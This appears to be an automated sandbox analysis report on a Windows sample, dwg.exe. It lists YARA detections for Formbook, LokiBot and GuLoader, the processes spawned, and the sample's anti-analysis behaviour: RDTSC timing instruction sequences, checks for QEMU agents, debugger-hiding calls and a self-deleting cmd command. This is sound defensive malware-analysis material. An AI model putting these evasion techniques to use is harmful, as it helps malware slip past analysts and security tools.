      Source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000D.00000002.495263682.0000000004927000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/0@13/8
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6500:120:WilError_01
      Source: C:\Users\user\Desktop\dwg.exeFile created: C:\Users\user\AppData\Local\Temp\~DF888B9D52BBCA55F9.TMPJump to behavior
      Source: dwg.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\dwg.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: C:\Users\user\Desktop\dwg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
      Source: dwg.exeReversingLabs: Detection: 27%
      Source: unknownProcess created: C:\Users\user\Desktop\dwg.exe 'C:\Users\user\Desktop\dwg.exe'
      Source: unknownProcess created: C:\Users\user\Desktop\dwg.exe 'C:\Users\user\Desktop\dwg.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\dwg.exe'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\dwg.exeProcess created: C:\Users\user\Desktop\dwg.exe 'C:\Users\user\Desktop\dwg.exe' Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\dwg.exe'Jump to behavior
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000002.510174852.0000000007140000.00000002.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: dwg.exe, 00000001.00000002.312554302.000000001E33F000.00000040.00000001.sdmp, rundll32.exe, 0000000D.00000002.493208853.000000000450F000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: dwg.exe, rundll32.exe
      Source: Binary string: rundll32.pdb source: dwg.exe, 00000001.00000003.305857961.0000000000A40000.00000004.00000001.sdmp
      Source: Binary string: rundll32.pdbGCTL source: dwg.exe, 00000001.00000003.305857961.0000000000A40000.00000004.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000002.510174852.0000000007140000.00000002.00000001.sdmp

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: Process Memory Space: dwg.exe PID: 5316, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: dwg.exe PID: 1544, type: MEMORY
      Yara detected VB6 Downloader GenericShow sources
      Source: Yara matchFile source: Process Memory Space: dwg.exe PID: 5316, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: dwg.exe PID: 1544, type: MEMORY
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02165A66 push eax; ret 0_2_02165AE3
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E29D0D1 push ecx; ret 1_2_1E29D0E4
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00565A66 push eax; ret 1_2_00565AE3
      Source: C:\Windows\explorer.exeCode function: 4_2_07410B20 push cs; retf 4_2_07410BCA
      Source: C:\Windows\explorer.exeCode function: 4_2_07411BF3 push 75CE108Ch; ret 4_2_07411BF8
      Source: C:\Windows\explorer.exeCode function: 4_2_07415397 push ss; iretd 4_2_07415398
      Source: C:\Windows\explorer.exeCode function: 4_2_07411998 push ss; retf 4_2_074119B6
      Source: C:\Windows\explorer.exeCode function: 4_2_0741503B push ebx; retf 4_2_0741503C
      Source: C:\Windows\explorer.exeCode function: 4_2_07411CD9 push cs; retf 4_2_07411CDA
      Source: C:\Windows\explorer.exeCode function: 4_2_07412AEF push es; iretd 4_2_07412AF0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0446D0D1 push ecx; ret 13_2_0446D0E4
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A583D push 0000003Fh; ret 13_2_001A5846
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A533F push FFFFFF96h; ret 13_2_001A5344
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0019C32F push es; ret 13_2_0019C33F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001AB3D5 push eax; ret 13_2_001AB428
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001AB42B push eax; ret 13_2_001AB492
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001AB422 push eax; ret 13_2_001AB428
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001AB48C push eax; ret 13_2_001AB492
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A5CD9 push C872E20Ah; retf 13_2_001A5CDE
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A5D64 push edx; ret 13_2_001A5D6C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001ACE0D push ss; retf 13_2_001ACE19
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0019CF58 push ecx; ret 13_2_0019CF59
      Source: C:\Users\user\Desktop\dwg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dwg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dwg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dwg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dwg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dwg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dwg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion:

      barindex
      Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216587D LoadLibraryA,0_2_0216587D
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_0056587D LoadLibraryA,1_2_0056587D
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 0000000002164B82 second address: 0000000002164B82 instructions:
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 00000000021604FB second address: 00000000021604FB instructions:
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 00000000021639B6 second address: 00000000021639B6 instructions:
      Tries to detect Any.runShow sources
      Source: C:\Users\user\Desktop\dwg.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\dwg.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Users\user\Desktop\dwg.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\dwg.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: dwg.exe, 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, dwg.exe, 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE8
      Source: dwg.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 0000000002162C75 second address: 0000000002162C75 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov ecx, 00001000h 0x00000010 test dl, FFFFFFCAh 0x00000013 div ecx 0x00000015 cmp edx, 00000000h 0x00000018 jne 00007F84D4958ECEh 0x0000001a dec ebx 0x0000001b xor edx, edx 0x0000001d clc 0x0000001e mov eax, ebx 0x00000020 pushad 0x00000021 lfence 0x00000024 rdtsc
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 0000000002164B82 second address: 0000000002164B82 instructions:
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 00000000021604FB second address: 00000000021604FB instructions:
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 00000000021639B6 second address: 00000000021639B6 instructions:
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 0000000000562C75 second address: 0000000000562C75 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov ecx, 00001000h 0x00000010 test dl, FFFFFFCAh 0x00000013 div ecx 0x00000015 cmp edx, 00000000h 0x00000018 jne 00007F84D4958ECEh 0x0000001a dec ebx 0x0000001b xor edx, edx 0x0000001d clc 0x0000001e mov eax, ebx 0x00000020 pushad 0x00000021 lfence 0x00000024 rdtsc
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000001985F4 second address: 00000000001985FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 000000000019898E second address: 0000000000198994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216329B rdtsc 0_2_0216329B
      Source: C:\Windows\explorer.exe TID: 6728Thread sleep time: -35000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: explorer.exe, 00000004.00000000.288554019.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
      Source: dwg.exe, 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, dwg.exe, 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe8
      Source: explorer.exe, 00000004.00000000.275549634.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000004.00000000.287839611.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 00000004.00000000.275599179.000000000374F000.00000004.00000001.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: explorer.exe, 00000004.00000000.275611265.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
      Source: explorer.exe, 00000004.00000000.275599179.000000000374F000.00000004.00000001.sdmpBinary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
      Source: explorer.exe, 00000004.00000000.288625970.00000000089B5000.00000004.00000001.sdmpBinary or memory string: E#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA36
      Source: dwg.exe, 00000001.00000003.269507023.0000000000A38000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000004.00000000.273584197.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
      Source: explorer.exe, 00000004.00000000.288625970.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
      Source: explorer.exe, 00000004.00000000.283148438.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
      Source: explorer.exe, 00000004.00000000.287839611.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: dwg.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000004.00000000.287839611.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: explorer.exe, 00000004.00000000.288625970.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
      Source: explorer.exe, 00000004.00000000.287839611.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\dwg.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging:

      barindex
      Contains functionality to hide a thread from the debuggerShow sources
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216329B NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,021653D5,02160484,2D9CC76C,DFCB8F120_2_0216329B
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\dwg.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\dwg.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\dwg.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\dwg.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\dwg.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\dwg.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216329B rdtsc 0_2_0216329B
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02163A2C LdrInitializeThunk,0_2_02163A2C
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02161E12 mov eax, dword ptr fs:[00000030h]0_2_02161E12
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02164AB9 mov eax, dword ptr fs:[00000030h]0_2_02164AB9
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02164F41 mov eax, dword ptr fs:[00000030h]0_2_02164F41
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02161FF8 mov eax, dword ptr fs:[00000030h]0_2_02161FF8
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02162C30 mov eax, dword ptr fs:[00000030h]0_2_02162C30
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216587D mov eax, dword ptr fs:[00000030h]0_2_0216587D
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02165866 mov eax, dword ptr fs:[00000030h]0_2_02165866
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021658D6 mov eax, dword ptr fs:[00000030h]0_2_021658D6
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02161968 mov eax, dword ptr fs:[00000030h]0_2_02161968
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24E620 mov eax, dword ptr fs:[00000030h]1_2_1E24E620
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2FFE3F mov eax, dword ptr fs:[00000030h]1_2_1E2FFE3F
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24C600 mov eax, dword ptr fs:[00000030h]1_2_1E24C600
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24C600 mov eax, dword ptr fs:[00000030h]1_2_1E24C600
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24C600 mov eax, dword ptr fs:[00000030h]1_2_1E24C600
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E278E00 mov eax, dword ptr fs:[00000030h]1_2_1E278E00
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301608 mov eax, dword ptr fs:[00000030h]1_2_1E301608
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27A61C mov eax, dword ptr fs:[00000030h]1_2_1E27A61C
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27A61C mov eax, dword ptr fs:[00000030h]1_2_1E27A61C
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25766D mov eax, dword ptr fs:[00000030h]1_2_1E25766D
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E26AE73 mov eax, dword ptr fs:[00000030h]1_2_1E26AE73
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E26AE73 mov eax, dword ptr fs:[00000030h]1_2_1E26AE73
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E26AE73 mov eax, dword ptr fs:[00000030h]1_2_1E26AE73
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E26AE73 mov eax, dword ptr fs:[00000030h]1_2_1E26AE73
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E26AE73 mov eax, dword ptr fs:[00000030h]1_2_1E26AE73
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E257E41 mov eax, dword ptr fs:[00000030h]1_2_1E257E41
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E257E41 mov eax, dword ptr fs:[00000030h]1_2_1E257E41
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E257E41 mov eax, dword ptr fs:[00000030h]1_2_1E257E41
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E257E41 mov eax, dword ptr fs:[00000030h]1_2_1E257E41
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E257E41 mov eax, dword ptr fs:[00000030h]1_2_1E257E41
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E257E41 mov eax, dword ptr fs:[00000030h]1_2_1E257E41
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30AE44 mov eax, dword ptr fs:[00000030h]1_2_1E30AE44
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30AE44 mov eax, dword ptr fs:[00000030h]1_2_1E30AE44
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C46A7 mov eax, dword ptr fs:[00000030h]1_2_1E2C46A7
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E310EA5 mov eax, dword ptr fs:[00000030h]1_2_1E310EA5
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E310EA5 mov eax, dword ptr fs:[00000030h]1_2_1E310EA5
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E310EA5 mov eax, dword ptr fs:[00000030h]1_2_1E310EA5
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2DFE87 mov eax, dword ptr fs:[00000030h]1_2_1E2DFE87
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2716E0 mov ecx, dword ptr fs:[00000030h]1_2_1E2716E0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2576E2 mov eax, dword ptr fs:[00000030h]1_2_1E2576E2
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E318ED6 mov eax, dword ptr fs:[00000030h]1_2_1E318ED6
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2736CC mov eax, dword ptr fs:[00000030h]1_2_1E2736CC
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2FFEC0 mov eax, dword ptr fs:[00000030h]1_2_1E2FFEC0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E288EC7 mov eax, dword ptr fs:[00000030h]1_2_1E288EC7
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E244F2E mov eax, dword ptr fs:[00000030h]1_2_1E244F2E
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E244F2E mov eax, dword ptr fs:[00000030h]1_2_1E244F2E
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27E730 mov eax, dword ptr fs:[00000030h]1_2_1E27E730
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27A70E mov eax, dword ptr fs:[00000030h]1_2_1E27A70E
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27A70E mov eax, dword ptr fs:[00000030h]1_2_1E27A70E
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E26F716 mov eax, dword ptr fs:[00000030h]1_2_1E26F716
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E31070D mov eax, dword ptr fs:[00000030h]1_2_1E31070D
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E31070D mov eax, dword ptr fs:[00000030h]1_2_1E31070D
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2DFF10 mov eax, dword ptr fs:[00000030h]1_2_1E2DFF10
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2DFF10 mov eax, dword ptr fs:[00000030h]1_2_1E2DFF10
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25FF60 mov eax, dword ptr fs:[00000030h]1_2_1E25FF60
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E318F6A mov eax, dword ptr fs:[00000030h]1_2_1E318F6A
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25EF40 mov eax, dword ptr fs:[00000030h]1_2_1E25EF40
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E258794 mov eax, dword ptr fs:[00000030h]1_2_1E258794
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C7794 mov eax, dword ptr fs:[00000030h]1_2_1E2C7794
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C7794 mov eax, dword ptr fs:[00000030h]1_2_1E2C7794
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C7794 mov eax, dword ptr fs:[00000030h]1_2_1E2C7794
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2837F5 mov eax, dword ptr fs:[00000030h]1_2_1E2837F5
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27BC2C mov eax, dword ptr fs:[00000030h]1_2_1E27BC2C
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C6C0A mov eax, dword ptr fs:[00000030h]1_2_1E2C6C0A
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C6C0A mov eax, dword ptr fs:[00000030h]1_2_1E2C6C0A
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C6C0A mov eax, dword ptr fs:[00000030h]1_2_1E2C6C0A
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C6C0A mov eax, dword ptr fs:[00000030h]1_2_1E2C6C0A
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]1_2_1E301C06
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]1_2_1E301C06
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]1_2_1E301C06
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]1_2_1E301C06
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]1_2_1E301C06
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]1_2_1E301C06
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]1_2_1E301C06
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]1_2_1E301C06
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]1_2_1E301C06
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]1_2_1E301C06
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]1_2_1E301C06
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]1_2_1E301C06
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]1_2_1E301C06
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]1_2_1E301C06
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E31740D mov eax, dword ptr fs:[00000030h]1_2_1E31740D
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E31740D mov eax, dword ptr fs:[00000030h]1_2_1E31740D
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E31740D mov eax, dword ptr fs:[00000030h]1_2_1E31740D
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E26746D mov eax, dword ptr fs:[00000030h]1_2_1E26746D
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27A44B mov eax, dword ptr fs:[00000030h]1_2_1E27A44B
